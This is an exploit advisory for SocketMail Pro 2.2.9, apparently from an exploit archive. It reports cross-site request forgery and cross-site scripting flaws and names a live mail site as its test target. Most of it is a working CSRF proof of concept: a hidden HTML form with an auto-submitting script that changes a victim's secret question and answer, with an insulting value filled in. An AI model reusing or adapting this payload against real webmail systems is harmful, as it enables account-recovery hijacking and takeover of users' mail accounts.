SocketMail Pro version 2.2.9 suffers from cross site request forgery and cross site scripting vulnerabilities.
8c6779a1eadb006c8062a398d4c92c4cbce1b3d62daf99afa8ff5199b15e3922
#Title:SocketMail Pro version 2.2.9 CSRF (Cross Site Request Forgery) && XSS (Cross Site Scripting)
#Author:MetaiZm
#Software:SocketMail Pro version 2.2.9
#Website:http://socketmail.com/
#Tested on:Windows XP SP3
# Description :
Subject xss codes inject and email send
-> Screen : http://s019.radikal.ru/i627/1204/e2/0ce8a6b54b52.jpg (XSS) # Author:B0T_25
Cross Site Request Forgery Change to Secret question <-
# PoC: http://pastebin.com/diSCcMXM (CSRF)
<form action="http://mail.hayastan.am/home/secretqtn.php" method=post name="signup">
<input type=hidden name='action' value='upd'>
<input type=text name="user_secret_qtn" size="30" maxlength="50" value="hayastan?">
<input type=text name="user_secret_answer" size="30" maxlength="50" value="sikdimseni">
<input type="submit" value="gonder"/>
</form>
<script language="javascript">
document.forms[0].submit()
</script>
Dipnot: böyrəy sözüm yoxdur! ^_^
Test site:mail.hayastan.am